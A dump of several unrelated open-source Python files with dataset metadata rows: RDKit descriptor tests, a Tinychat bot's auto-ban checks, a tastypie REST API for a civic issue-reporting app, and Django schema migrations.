self.__testDesc(fName,col,MolSurf.SMR_VSA9)
col = 11
self.__testDesc(fName,col,MolSurf.SlogP_VSA1)
col = 12
self.__testDesc(fName,col,MolSurf.SlogP_VSA10)
col = 13
self.__testDesc(fName,col,MolSurf.SlogP_VSA11)
col = 14
self.__testDesc(fName,col,MolSurf.SlogP_VSA12)
def _testMOELong2(self):
""" test calculation of MOE-type descriptors
"""
fName = 'PP_descrs_regress.VSA.2.csv'
col = 1
self.__testDesc(fName,col,MolSurf.SMR_VSA1)
col = 2
self.__testDesc(fName,col,MolSurf.SMR_VSA10)
col = 11
self.__testDesc(fName,col,MolSurf.SlogP_VSA1)
col = 12
self.__testDesc(fName,col,MolSurf.SlogP_VSA10)
col = 13
self.__testDesc(fName,col,MolSurf.SlogP_VSA11)
col = 14
self.__testDesc(fName,col,MolSurf.SlogP_VSA12)
def testBalabanJ(self):
""" test calculation of the Balaban J value
J values are from Balaban's paper and have had roundoff
errors and typos corrected.
"""
data = [# alkanes
('CC',1.0),('CCC',1.6330),
('CCCC',1.9747),('CC(C)C',2.3238),
('CCCCC',2.1906),('CC(C)CC',2.5396),('CC(C)(C)C',3.0237),
('CCCCCC',2.3391),('CC(C)CCC',2.6272),('CCC(C)CC',2.7542),('CC(C)(C)CC',3.1685),
('CC(C)C(C)C',2.9935),
# cycloalkanes
('C1CCCCC1',2.0000),
('C1C(C)CCCC1',2.1229),
('C1C(CC)CCCC1',2.1250),
('C1C(C)C(C)CCC1',2.2794),
('C1C(C)CC(C)CC1',2.2307),
('C1C(C)CCC(C)C1',2.1924),
('C1C(CCC)CCCC1',2.0779),
('C1C(C(C)C)CCCC1',2.2284),
('C1C(CC)C(C)CCC1',2.2973),
('C1C(CC)CC(C)CC1',2.2317),
('C1C(CC)CCC(C)C1',2.1804),
('C1C(C)C(C)C(C)CC1',2.4133),
('C1C(C)C(C)CC(C)C1',2.3462),
('C1C(C)CC(C)CC1(C)',2.3409),
# aromatics
('c1ccccc1',3.0000),
('c1c(C)cccc1',3.0215),
('c1c(CC)cccc1',2.8321),
('c1c(C)c(C)ccc1',3.1349),
('c1c(C)cc(C)cc1',3.0777),
('c1c(C)ccc(C)c1',3.0325),
('c1c(CCC)cccc1',2.6149),
('c1c(C(C)C)cccc1',2.8483),
('c1c(CC)c(C)ccc1',3.0065),
('c1c(CC)cc(C)cc1',2.9369),
('c1c(CC)ccc(C)c1',2.8816),
('c1c(C)c(C)c(C)cc1',3.2478),
('c1c(C)c(C)cc(C)c1',3.1717),
('c1c(C)cc(C)cc1(C)',3.1657)
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
j = GraphDescriptors.BalabanJ(m,forceDMat=1)
assert feq(j,res),'mol %s (J=%f) should have J=%f'%(smi,j,res)
j = GraphDescriptors.BalabanJ(m)
assert feq(j,res),'second pass: mol %s (J=%f) should have J=%f'%(smi,j,res)
def _testBalabanJLong(self):
""" test calculation of the balaban j value
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 1
self.__testDesc(fName,col,GraphDescriptors.BalabanJ)
def _testKappa1Long(self):
""" test calculation of kappa1
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 31
self.__testDesc(fName,col,GraphDescriptors.Kappa1)
def _testKappa2Long(self):
""" test calculation of kappa2
"""
fName = 'PP_descrs_regress.rest.2.csv'
col = 32
self.__testDesc(fName,col,GraphDescriptors.Kappa2)
def _testChi0Long(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 5
self.__testDesc(fName,col,GraphDescriptors.Chi0)
def _testChi1Long(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 8
self.__testDesc(fName,col,GraphDescriptors.Chi1)
def _testChi0v(self):
""" test calculation of Chi0v
"""
data = [('CCCCCC',4.828),('CCC(C)CC',4.992),('CC(C)CCC',4.992),
('CC(C)C(C)C',5.155),('CC(C)(C)CC',5.207),
('CCCCCO',4.276),('CCC(O)CC',4.439),('CC(O)(C)CC',4.654),('c1ccccc1O',3.834),
('CCCl',2.841),('CCBr',3.671),('CCI',4.242)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi0v(m)
assert feq(chi,res,1e-3),'mol %s (Chi0v=%f) should have Chi0V=%f'%(smi,chi,res)
def _testChi0vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 7
self.__testDesc(fName,col,GraphDescriptors.Chi0v)
def testChi1v(self):
""" test calculation of Chi1v
"""
data = [('CCCCCC',2.914),('CCC(C)CC',2.808),('CC(C)CCC',2.770),
('CC(C)C(C)C',2.643),('CC(C)(C)CC',2.561),
('CCCCCO',2.523),('CCC(O)CC',2.489),('CC(O)(C)CC',2.284),('c1ccccc1O',2.134)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi1v(m)
assert feq(chi,res,1e-3),'mol %s (Chi1v=%f) should have Chi1V=%f'%(smi,chi,res)
def _testChi1vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 10
self.__testDesc(fName,col,GraphDescriptors.Chi1v)
def testPathCounts(self):
""" FIX: this should be in some other file
"""
data = [('CCCCCC',(6,5,4,3,2,1)),
('CCC(C)CC',(6,5,5,4,1,0)),
('CC(C)CCC',(6,5,5,3,2,0)),
('CC(C)C(C)C',(6,5,6,4,0,0)),
('CC(C)(C)CC',(6,5,7,3,0,0)),
('CCCCCO',(6,5,4,3,2,1)),
('CCC(O)CC',(6,5,5,4,1,0)),
('CC(O)(C)CC',(6,5,7,3,0,0)),
('c1ccccc1O',(7,7,8,8,8,8)),
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
for i in range(1,6):
cnt = len(Chem.FindAllPathsOfLengthN(m,i,useBonds=1))
assert cnt==res[i],(smi,i,cnt,res[i],Chem.FindAllPathsOfLengthN(m,i,useBonds=1))
cnt = len(Chem.FindAllPathsOfLengthN(m,i+1,useBonds=0))
        assert cnt==res[i],(smi,i,cnt,res[i],Chem.FindAllPathsOfLengthN(m,i+1,useBonds=0))
def testChi2v(self):
""" test calculation of Chi2v
"""
data = [('CCCCCC',1.707),('CCC(C)CC',1.922),('CC(C)CCC',2.183),
('CC(C)C(C)C',2.488),('CC(C)(C)CC',2.914),
('CCCCCO',1.431),('CCC(O)CC',1.470),('CC(O)(C)CC',2.166),('c1ccccc1O',1.336),
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi2v(m)
assert feq(chi,res,1e-3),'mol %s (Chi2v=%f) should have Chi2V=%f'%(smi,chi,res)
def _testChi2vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 12
self.__testDesc(fName,col,GraphDescriptors.Chi2v)
def testChi3v(self):
""" test calculation of Chi3v
"""
data = [('CCCCCC',0.957),('CCC(C)CC',1.394),('CC(C)CCC',0.866),('CC(C)C(C)C',1.333),('CC(C)(C)CC',1.061),
('CCCCCO',0.762),('CCC(O)CC',0.943),('CC(O)(C)CC',0.865),('c1ccccc1O',0.756)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi3v(m)
assert feq(chi,res,1e-3),'mol %s (Chi3v=%f) should have Chi3V=%f'%(smi,chi,res)
def _testChi3vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 14
self.__testDesc(fName,col,GraphDescriptors.Chi3v)
def testChi4v(self):
""" test calculation of Chi4v
"""
data = [('CCCCCC',0.500),('CCC(C)CC',0.289),('CC(C)CCC',0.577),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.362),('CCC(O)CC',0.289),('CC(O)(C)CC',0.000),('c1ccccc1O',0.428)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi4v(m)
assert feq(chi,res,1e-3),'mol %s (Chi4v=%f) should have Chi4V=%f'%(smi,chi,res)
def testChi5v(self):
""" test calculation of Chi5v
"""
data = [('CCCCCC',0.250),('CCC(C)CC',0.000),('CC(C)CCC',0.000),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.112),('CCC(O)CC',0.000),('CC(O)(C)CC',0.000),('c1ccccc1O',0.242)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.ChiNv_(m,5)
assert feq(chi,res,1e-3),'mol %s (Chi5v=%f) should have Chi5V=%f'%(smi,chi,res)
def testChi0n(self):
""" test calculation of Chi0n
"""
data = [('CCCCCC',4.828),('CCC(C)CC',4.992),('CC(C)CCC',4.992),
('CC(C)C(C)C',5.155),('CC(C)(C)CC',5.207),
('CCCCCO',4.276),('CCC(O)CC',4.439),('CC(O)(C)CC',4.654),('c1ccccc1O',3.834),
('CCCl',2.085),('CCBr',2.085),('CCI',2.085),]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi0n(m)
assert feq(chi,res,1e-3),'mol %s (Chi0n=%f) should have Chi0n=%f'%(smi,chi,res)
def _testChi0nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 6
self.__testDesc(fName,col,GraphDescriptors.Chi0n)
def testChi1n(self):
""" test calculation of Chi1n
"""
data = [('CCCCCC',2.914),('CCC(C)CC',2.808),('CC(C)CCC',2.770),
('CC(C)C(C)C',2.643),('CC(C)(C)CC',2.561),
('CCCCCO',2.523),('CCC(O)CC',2.489),('CC(O)(C)CC',2.284),('c1ccccc1O',2.134)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi1n(m)
assert feq(chi,res,1e-3),'mol %s (Chi1n=%f) should have Chi1N=%f'%(smi,chi,res)
def _testChi1nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 9
self.__testDesc(fName,col,GraphDescriptors.Chi1n)
def testChi2n(self):
""" test calculation of Chi2n
"""
data = [('CCCCCC',1.707),('CCC(C)CC',1.922),('CC(C)CCC',2.183),
('CC(C)C(C)C',2.488),('CC(C)(C)CC',2.914),
('CCCCCO',1.431),('CCC(O)CC',1.470),('CC(O)(C)CC',2.166),('c1ccccc1O',1.336)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi2n(m)
assert feq(chi,res,1e-3),'mol %s (Chi2n=%f) should have Chi2N=%f'%(smi,chi,res)
def _testChi2nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 11
self.__testDesc(fName,col,GraphDescriptors.Chi2n)
def testChi3n(self):
""" test calculation of Chi3n
"""
data = [('CCCCCC',0.957),('CCC(C)CC',1.394),('CC(C)CCC',0.866),('CC(C)C(C)C',1.333),('CC(C)(C)CC',1.061),
('CCCCCO',0.762),('CCC(O)CC',0.943),('CC(O)(C)CC',0.865),('c1ccccc1O',0.756)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi3n(m)
assert feq(chi,res,1e-3),'mol %s (Chi3n=%f) should have Chi3N=%f'%(smi,chi,res)
def _testChi3nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 13
self.__testDesc(fName,col,GraphDescriptors.Chi3n)
def testChi4n(self):
""" test calculation of Chi4n
"""
data = [('CCCCCC',0.500),('CCC(C)CC',0.289),('CC(C)CCC',0.577),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.362),('CCC(O)CC',0.289),('CC(O)(C)CC',0.000),('c1ccccc1O',0.428)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi4n(m)
assert feq(chi,res,1e-3),'mol %s (Chi4n=%f) should have Chi4N=%f'%(smi,chi,res)
def testIssue125(self):
""" test an issue with calculating BalabanJ
"""
smi = 'O=C(OC)C1=C(C)NC(C)=C(C(OC)=O)C1C2=CC=CC=C2[N+]([O-])=O'
m1 = Chem.MolFromSmiles(smi)
m2 = Chem.MolFromSmiles(smi)
Chem.MolToSmiles(m1)
j1=GraphDescriptors.BalabanJ(m1)
j2=GraphDescriptors.BalabanJ(m2)
assert feq(j1,j2)
def testOrderDepend(self):
""" test order dependence of some descriptors:
"""
data = [('C=CC=C',21.01955,2.73205),
('O=CC=O',25.01955,2.73205),
('FCC(=O)CF',46.7548875,2.98816),
('O=C1C=CC(=O)C=C1',148.705216,2.8265),
('C12C(F)=C(O)C(F)C1C(F)=C(O)C(F)2',315.250442,2.4509),
('C12CC=CCC1C(=O)C3CC=CCC3C(=O)2',321.539522,1.95986)]
for smi,CT,bal in data:
m = Chem.MolFromSmiles(smi)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
m = Chem.MolFromSmiles(smi)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
if __name__ == '__main__':
import sys,getopt,re
doLong=0
if len(sys.argv) >1:
args,extras=getopt.getopt(sys.argv[1:],'l')
for arg,val in args:
if arg=='-l':
doLong=1
sys.argv.remove('-l')
if doLong:
for methName in dir(TestCase):
if re.match('_test',methName):
newName = re.sub('_test','test',methName)
exec('TestCase.%s = TestCase.%s'%(newName,methName))
unittest.main()
|
bsd-3-clause
| -2,990,828,470,993,036,300 | 30.829649 | 302 | 0.57981 | false |
nortxort/tinybot-rtc
|
check_user.py
|
1
|
3452
|
class CheckUser:
"""
A class to perform various ban checks on a User object.
    The checks are done against the different ban lists
    and other ban rules in the config file.
    If a check returns True, the user was banned (or kicked).
"""
def __init__(self, tinybot, user, conf):
"""
Initialize the CheckUser class.
:param tinybot: An instance of TinychatBot.
:type tinybot: TinychatBot
:param user: The User object to check.
:type user: User
:param conf: The config file.
:type conf: config
"""
self.tinybot = tinybot
self.user = user
self.config = conf
def check_account(self):
"""
Check if the user account is in the account bans list.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.account in self.config.B_ACCOUNT_BANS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (bad account)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (bad account)')
return True
return False
def guest_entry(self):
"""
Check if the user is a guest, and allowed to join.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.account == '' and not self.config.B_ALLOW_GUESTS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (guests not allowed)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (guests not allowed)')
return True
return False
def check_nick(self):
"""
Check if the user's nick is in the nick bans list.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.nick in self.config.B_NICK_BANS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (bad nick)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (bad nick)')
return True
return False
def check_lurker(self):
"""
Check if the user is a lurker, and allowed to join.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.is_lurker and not self.config.B_ALLOW_LURKERS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (lurkers not allowed)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (lurkers not allowed)')
return True
return False
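# Illustrative usage sketch -- the join-handling code below is an assumption
# about how TinychatBot would drive these checks, not part of this module:
#   checker = CheckUser(tinybot, user, config)
#   for check in (checker.check_account, checker.guest_entry,
#                 checker.check_nick, checker.check_lurker):
#       if check():  # stop at the first check that kicks/bans the user
#           break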
|
mit
| -4,520,653,867,858,702,300 | 28.504274 | 80 | 0.550985 | false |
fraunhoferfokus/fixmycity
|
api/tasty.py
|
1
|
10043
|
'''
/*******************************************************************************
*
* Copyright (c) 2015 Fraunhofer FOKUS, All rights reserved.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3.0 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library. If not, see <http://www.gnu.org/licenses/>.
*
* AUTHORS: Louay Bassbouss (louay.bassbouss@fokus.fraunhofer.de)
*
******************************************************************************/
'''
from django.contrib.auth.models import User
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from tastypie import fields
from tastypie.utils import trailing_slash, dict_strip_unicode_keys
from tastypie.http import HttpGone, HttpMultipleChoices
from tastypie.authentication import Authentication
from tastypie.authorization import Authorization
from django.conf.urls.defaults import url
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from tastypie.cache import SimpleCache
import api.models
class ReportResource(ModelResource):
user = fields.ToOneField('api.tasty.UserResource', 'user', full=True)
status = fields.ToOneField('api.tasty.StatusResource', 'status', full=True)
category = fields.ToOneField('api.tasty.CategoryResource', 'category', full=True)
address = fields.ToOneField('api.tasty.AddressResource', 'address', full=True)
comments = fields.ToManyField('api.tasty.CommentResource', 'comment_set', related_name='report', blank=True)
ratings = fields.ToManyField('api.tasty.RatingResource', 'rating_set', related_name='report', blank=True)
photos = fields.ToManyField('api.tasty.PhotoResource', 'photo_set', related_name='report', blank=True, full=True)
class Meta:
resource_name = 'reports'
queryset = api.models.Report.objects.all()
authentication = Authentication()
authorization = Authorization()
list_allowed_methods = ['get', 'post']
detail_allowed_methods = ['get', 'post', 'put', 'delete'] # no 'patch'
always_return_data = True # XXX
#cache = SimpleCache()
filtering = {
'user': ALL_WITH_RELATIONS,
'status': ALL_WITH_RELATIONS,
'photos': ALL_WITH_RELATIONS,
'tags': ['icontains'],
'address': ALL_WITH_RELATIONS,
'category': ALL_WITH_RELATIONS,
'creationTime': ['exact', 'range', 'lt', 'lte', 'gte', 'gt'],
}
ordering = ['id', 'creationTime']
def build_filters(self, filters={}):
"""Add custom filters (radius, onlyWithPhotos)"""
orm_filters = super(ReportResource, self).build_filters(filters)
# filter by photos
photos = api.models.Photo.objects.all()
try:
if int(filters.get('onlyWithPhotos')) == 1:
orm_filters['pk__in'] = set([p.report.pk for p in photos])
except:
pass
# filter by distance
try:
lat = float(filters.get('latitude'))
lng = float(filters.get('longitude'))
rad = float(filters.get('radius'))
reports = api.models.Report.objects.nearby(lat, lng, rad)
pks = [r.pk for r in reports]
try:
orm_filters['pk__in'] = orm_filters['pk__in'].intersection(pks)
except:
orm_filters['pk__in'] = pks
except:
pass
return orm_filters
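    # Example query strings this filter set is meant to accept (the URL
    # prefix is illustrative; only the parameter names come from the code
    # above):
    #   /api/v1/reports/?onlyWithPhotos=1
    #   /api/v1/reports/?latitude=52.52&longitude=13.40&radius=5.0
    # Missing or unparseable values simply fall through to the default
    # filters thanks to the try/except blocks above.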
def obj_create(self, bundle, request=None, **kwargs):
return super(ReportResource, self).obj_create(bundle, request,
user=request.user)
def hydrate_address(self, bundle):
resrc = AddressResource()
addr = dict((k[5:], v) for k,v in bundle.data.iteritems() \
if k.startswith('addr_'))
geo = dict((k[4:], float(v)) for k,v in bundle.data.iteritems() \
if k.startswith('geo_'))
addr.update(geo)
addrbundle = resrc.build_bundle(obj=api.models.Address,
data=dict_strip_unicode_keys(addr))
addrobj = resrc.obj_create(addrbundle).obj
bundle.obj.address = addrobj
return bundle
def dehydrate(self, bundle):
"""
Calculate averageRating and append to response bundle.
"""
total_score = 0.0
ratings = api.models.Rating.objects.filter(report__id=bundle.obj.id)
if not ratings.count():
return bundle
for rating in ratings:
total_score += rating.value
bundle.data['averageRating'] = total_score / ratings.count()
return bundle
def dehydrate_description(self, bundle):
#return bundle.data['description'].upper()
return bundle.data['description'] # do nothing
# nested resources
# ref: latest/cookbook.html#nested-resources
def override_urls(self):
return [
url(r"^reports/(?P<pk>\d+)/(?P<nest_resource>\w+)%s$" \
% trailing_slash(), self.wrap_view('handle_nested'),
name='api_handle_nested'),
]
def handle_nested(self, request, **kwargs):
resource_name = kwargs.pop('nest_resource')
resource = self.fields[resource_name].to_class().__class__
try:
stripped_kwargs = self.remove_api_resource_names(kwargs)
obj = self.cached_obj_get(request=request, **stripped_kwargs)
except ObjectDoesNotExist:
return HttpGone()
except MultipleObjectsReturned:
return HttpMultipleChoices('Multiple objects with this PK.')
r = resource()
if request.method.lower() == 'get':
return r.get_list(request, report=obj.pk)
elif request.method.lower() == 'post':
cont_type = request.META.get('CONTENT_TYPE', 'application/json')
deserialized = r.deserialize(request, format=cont_type)
report_uri = ReportResource().get_resource_uri(obj)
user_uri = UserResource().get_resource_uri(request.user)
parms = {'report': report_uri, 'user': user_uri}
if 'form' in cont_type:
deserialized = dict(
(str(k), v[0] if (type(v)==list and len(v)>0) else v) \
for k, v in deserialized.iteritems())
parms.update(deserialized)
try:
bundle = r.build_bundle(
data=dict_strip_unicode_keys(parms),
request=request
)
r.is_valid(bundle, request)
r.obj_create(bundle) # this creates the actual child
except:
raise ValueError(parms)
            bundle_dehyd = r.full_dehydrate(bundle)
resp = r.create_response(request, bundle_dehyd)
resp['location'] = r.get_resource_uri(bundle)
resp.status_code = 201
return resp
else:
raise NotImplementedError('In POST and GET we trust.')
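    # Illustrative request flow for the nested route defined above (host and
    # payload are assumptions): a POST to /api/v1/reports/7/comments/ with a
    # JSON body {"body": "...", "title": "..."} creates a Comment whose
    # report and user URIs are filled in from the URL and the authenticated
    # user.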
class UserResource(ModelResource):
class Meta:
resource_name = 'users'
queryset = User.objects.all()
excludes = ['email', 'password', 'is_active', 'last_login',
'first_name', 'last_name',
'date_joined', 'is_staff', 'is_superuser']
allowed_methods = ['get']
#cache = SimpleCache()
filtering = { 'username': ALL, }
ordering = ['username', 'id']
class StatusResource(ModelResource):
class Meta:
resource_name = 'statuses'
queryset = api.models.Status.objects.all()
#cache = SimpleCache()
class CategoryResource(ModelResource):
class Meta:
resource_name = 'categories'
queryset = api.models.Category.objects.all()
#cache = SimpleCache()
class AddressResource(ModelResource):
class Meta:
queryset = api.models.Address.objects.all()
excludes = ['id']
#cache = SimpleCache()
class CommentResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user', full=True)
newStatus = fields.ToOneField(StatusResource, 'newStatus', full=True,
blank=True, null=True)
class Meta:
resource_name = 'comments'
queryset = api.models.Comment.objects.all()
authentication = Authentication()
authorization = Authorization()
#cache = SimpleCache()
filtering = {
'report': ALL,
'user': ALL_WITH_RELATIONS,
}
ordering = ['creationTime', 'newStatus', 'user', 'report', 'id']
class RatingResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user', full=True)
class Meta:
resource_name = 'ratings'
queryset = api.models.Rating.objects.all()
#cache = SimpleCache()
filtering = {
'report': ALL,
'user': ALL_WITH_RELATIONS,
}
class PhotoResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user')
class Meta:
resource_name = 'photos'
queryset = api.models.Photo.objects.all()
#cache = SimpleCache()
filtering = {
'report': ALL,
}
|
lgpl-3.0
| 2,120,749,673,092,615,000 | 36.755639 | 122 | 0.588967 | false |
cernvm/cvmfs-monitor
|
cvmfsweb/cvmfsmon/migrations/0001_initial.py
|
1
|
4140
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Stratum'
db.create_table('cvmfsmon_stratum', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('alias', self.gf('django.db.models.fields.CharField')(max_length=20)),
('level', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('cvmfsmon', ['Stratum'])
# Adding unique constraint on 'Stratum', fields ['alias', 'level']
db.create_unique('cvmfsmon_stratum', ['alias', 'level'])
# Adding model 'Repository'
db.create_table('cvmfsmon_repository', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('fqrn', self.gf('django.db.models.fields.CharField')(max_length=100)),
('project_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('project_description', self.gf('django.db.models.fields.TextField')(blank=True)),
('stratum0', self.gf('django.db.models.fields.related.ForeignKey')(related_name='stratum0', to=orm['cvmfsmon.Stratum'])),
))
db.send_create_signal('cvmfsmon', ['Repository'])
# Adding M2M table for field stratum1s on 'Repository'
m2m_table_name = db.shorten_name('cvmfsmon_repository_stratum1s')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('repository', models.ForeignKey(orm['cvmfsmon.repository'], null=False)),
('stratum', models.ForeignKey(orm['cvmfsmon.stratum'], null=False))
))
db.create_unique(m2m_table_name, ['repository_id', 'stratum_id'])
def backwards(self, orm):
# Removing unique constraint on 'Stratum', fields ['alias', 'level']
db.delete_unique('cvmfsmon_stratum', ['alias', 'level'])
# Deleting model 'Stratum'
db.delete_table('cvmfsmon_stratum')
# Deleting model 'Repository'
db.delete_table('cvmfsmon_repository')
# Removing M2M table for field stratum1s on 'Repository'
db.delete_table(db.shorten_name('cvmfsmon_repository_stratum1s'))
models = {
'cvmfsmon.repository': {
'Meta': {'object_name': 'Repository'},
'fqrn': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'stratum0': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stratum0'", 'to': "orm['cvmfsmon.Stratum']"}),
'stratum1s': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'stratum1s'", 'symmetrical': 'False', 'to': "orm['cvmfsmon.Stratum']"})
},
'cvmfsmon.stratum': {
'Meta': {'unique_together': "(('alias', 'level'),)", 'object_name': 'Stratum'},
'alias': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['cvmfsmon']
|
bsd-2-clause
| 3,032,668,471,992,999,400 | 50.7625 | 170 | 0.595652 | false |
rwspicer/ARDA
|
arda_db/browser/migrations/0004_auto_20150320_0322.py
|
1
|
1718
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('browser', '0003_auto_20150320_0253'),
]
operations = [
migrations.CreateModel(
name='ROnline',
fields=[
('resource_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='browser.Resource')),
('otype', models.CharField(max_length=1, choices=[(b'0', b'video'), (b'1', b'article'), (b'2', b'web site')])),
('date', models.DateTimeField()),
('url', models.TextField(blank=True)),
],
options={
},
bases=('browser.resource',),
),
migrations.CreateModel(
name='SServices',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('diagnostic', models.BooleanField(default=False)),
('resource', models.BooleanField(default=False)),
('therapy', models.BooleanField(default=False)),
('educational', models.BooleanField(default=False)),
('referral', models.BooleanField(default=False)),
('legal', models.BooleanField(default=False)),
('city', models.CharField(max_length=30)),
('resourceLink', models.ForeignKey(to='browser.Resource')),
],
options={
},
bases=(models.Model,),
),
migrations.DeleteModel(
name='SService',
),
]
|
mit
| 5,817,100,351,531,621,000 | 36.347826 | 150 | 0.532014 | false |
RobinQuetin/CAIRIS-web
|
cairis/cairis/ConceptReferencePanel.py
|
1
|
2828
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
